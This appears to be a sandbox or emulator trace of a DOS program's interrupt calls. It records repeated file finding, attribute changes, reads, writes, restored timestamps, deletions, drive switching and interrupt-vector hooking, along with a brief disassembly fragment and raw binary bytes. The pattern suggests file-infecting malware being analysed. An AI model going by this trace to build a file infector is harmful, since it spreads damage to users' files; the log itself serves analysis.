2018-12-25T12:23:36.803362409Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:36.809549194Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:36.81626022Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:36.831504966Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:36.833653278Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:36.83721221Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:36.838534932Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:36.840221287Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:36.843704754Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.850813922Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.856573623Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:36.858960547Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:36.865916296Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:36.875881735Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:36.87976765Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:36.885624725Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:36.895004015Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:36.902657416Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:36.905353937Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:36.912882901Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:36.914966313Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:36.917862686Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:36.920119264Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:36.92651081Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:36.933813023Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:36.936887543Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:36.945619637Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:36.948841115Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:36.952361861Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:36.953877363Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:36.956160545Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:36.959386806Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:36.965453757Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:36.972427166Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:36.974150332Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:36.981197426Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:36.992779977Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:36.995922815Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:37.00220398Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:37.013100359Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:37.020043792Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:37.021783761Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:37.02839906Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:37.030077425Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:37.032727829Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:37.035554343Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:37.038014925Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:37.044513142Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:37.048057182Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:37.056729332Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:37.059186915Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:37.063114924Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:37.064825736Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:37.066459838Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:37.07083678Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:37.076856335Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:37.083304062Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:37.085858851Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:37.093466582Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:37.103012601Z 79 PC: 1541f | Find next file (See above)
2018-12-25T12:23:37.106993261Z 67 PC: 1542b | Get or set file attributes (See above)
2018-12-25T12:23:37.11381376Z 67 PC: 15433 | Get or set file attributes (See above)
2018-12-25T12:23:37.124382896Z 61 PC: 15438 | Open file (See above)
2018-12-25T12:23:37.132008021Z 87 PC: 1543e | Get or set file date and time (See above)
2018-12-25T12:23:37.134020192Z 63 PC: 15455 | Read file or device (See above)
2018-12-25T12:23:37.139591741Z 66 PC: 154a6 | Move file pointer (See above)
2018-12-25T12:23:37.141360934Z 44 PC: 1550b | Get time (See above)
2018-12-25T12:23:37.144196419Z 44 PC: 15528 | Get time (See above)
2018-12-25T12:23:37.146658953Z 44 PC: 15541 | Get time (See above)
2018-12-25T12:23:37.149234733Z 64 PC: 15550 | Write file or device (See above)
2018-12-25T12:23:37.164944347Z 44 PC: 15559 | Get time (See above)
2018-12-25T12:23:37.167650771Z 64 PC: 1556c | Write file or device (See above)
2018-12-25T12:23:37.175043547Z 44 PC: 15570 | Get time (See above)
2018-12-25T12:23:37.178125291Z 64 PC: 1557b | Write file or device (See above)
2018-12-25T12:23:37.181376231Z 66 PC: 15587 | Move file pointer (See above)
2018-12-25T12:23:37.183087306Z 66 PC: 155a8 | Move file pointer (See above)
2018-12-25T12:23:37.185296104Z 64 PC: 155b3 | Write file or device (See above)
2018-12-25T12:23:37.189013522Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:37.196881908Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:37.203722753Z 87 PC: 155cc | Get or set file date and time (See above)
2018-12-25T12:23:37.205503458Z 62 PC: 155d0 | Close file (See above)
2018-12-25T12:23:37.212334245Z 67 PC: 155da | Get or set file attributes (See above)
2018-12-25T12:23:37.222666077Z 14 PC: 151e9 | Set default drive (Drive = 'D')
2018-12-25T12:23:37.223956073Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:37.228061377Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:37.232347595Z 14 PC: 151f2 | Set default drive (Drive = 'E')
2018-12-25T12:23:37.233841255Z 59 PC: 152c0 | Change current directory (See above)
2018-12-25T12:23:37.238177512Z 14 PC: 15218 | Set default drive (Drive = 'A')
2018-12-25T12:23:37.240293353Z 59 PC: 15220 | Change current directory
2018-12-25T12:23:37.244437454Z 44 PC: 1523c | Get time 0x1523c: cmp cl, 5
0x1523f: jne 0x15244
0x15241: call 0x1534a
0x15244: cmp cl, 0xd
0x15247: jne 0x1524c
0x15249: call 0x15359
0x1524c: cmp cl, 0x1e
0x1524f: jne 0x15258
0x15251: lea dx, word ptr [bp + 0x290]
0x15255: call 0x15330
0x15258: cmp cl, 0x28
0x1525b: jne 0x15264
0x1525d: lea dx, word ptr [bp + 0x290]
0x15261: call 0x15330
0x15264: cmp cl, 0x32
0x15267: jne 0x15270
0x15269: lea dx, word ptr [bp + 0x2c7]
0x1526d: call 0x15330
0x15270: lea si, word ptr [bp + 0x195]
0x15274: lea di, word ptr [bp + 0x18d]
2018-12-25T12:23:37.247236837Z 78 PC: 15337 | Find first file
2018-12-25T12:23:37.254788147Z 67 PC: 15345 | Get or set file attributes (See above)
2018-12-25T12:23:37.264533712Z 65 PC: 15349 | Delete file (See above)
2018-12-25T12:23:37.300154748Z 53 PC: 14fba | Get interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:37.302500335Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.303611236Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.304779662Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.3065768Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.307975341Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.309697179Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.311199989Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.312557218Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.314687824Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.316374311Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.31762016Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.319653476Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.321502664Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.322850767Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.325970654Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.327063049Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.328510318Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.330328753Z 53 PC: 14fba | Get interrupt vector (See above)
2018-12-25T12:23:37.331999135Z 37 PC: 14fcf | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:37.333260219Z 37 PC: 14fd7 | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:23:37.335231144Z 37 PC: 14fdf | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:23:37.336783271Z 37 PC: 14fe7 | Set interrupt vector (Interrupt = '63' AKA 'Read file or device')
2018-12-25T12:23:37.338441627Z 68 PC: 15eab | I/O control for devices (Set for = '� ��O�Э:E�t��ҭ3ɬ� �u��ŝ]_^ZY[�P�/��t�\�ЭXâЭX�SQRWV�������6έ�6̭�6ʭ2ɬ �t:�t��t�����2ɪ���6έ��3����t!�Э �u:E�t��� �u�����}��')
2018-12-25T12:23:37.494019224Z 64 PC: 1563b | Write file or device (Write 0 bytes on handle 1)
2018-12-25T12:23:37.496530479Z 37 PC: 15111 | Set interrupt vector (Interrupt = '0' AKA 'Program terminate')
2018-12-25T12:23:37.497969305Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.500321584Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.502161111Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.503587573Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.505713442Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.507418599Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.508785755Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.510833719Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.512570176Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.513898771Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.516017318Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.517397835Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.518452707Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.520215285Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.521339411Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.522369519Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.524419407Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.52544443Z 37 PC: 15111 | Set interrupt vector (See above)
2018-12-25T12:23:37.52649359Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.529375324Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.531338878Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.533571188Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.536523936Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.538504222Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.54048268Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.543547582Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.545715624Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.547983968Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.551199809Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.553408648Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.555660932Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.558563941Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.560820916Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.563093993Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.56615715Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.568424995Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.570684532Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.57373138Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.57618695Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.578514729Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.581390826Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.584418083Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.58669122Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.589693785Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.592366702Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.59458754Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.597564476Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.600074055Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.602309691Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.605320284Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.607712714Z 6 PC: 15198 | Direct console I/O (See above)
2018-12-25T12:23:37.614824069Z 76 PC: 15150 | Terminate with return code (Return code = '200')